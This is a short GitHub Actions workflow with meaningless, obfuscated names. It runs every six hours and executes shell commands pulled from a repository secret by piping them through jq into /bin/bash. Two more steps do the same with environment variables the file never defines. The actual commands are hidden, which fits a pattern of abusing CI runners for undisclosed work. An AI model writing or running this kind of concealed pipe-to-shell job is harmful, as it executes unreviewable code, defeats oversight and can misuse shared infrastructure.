name: zhaliangyy
on:
  workflow_dispatch:
  schedule:
    - cron: '48 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhaliangyy
        env:
          de41736: ${{ secrets.de41736 }}
        run: |
          echo $de41736 | jq -r .gl4 | /bin/bash
          echo $g993 | jq -r .mrw1329 | /bin/bash
          echo $wa07557 | jq -r .ws27176 | /bin/bash

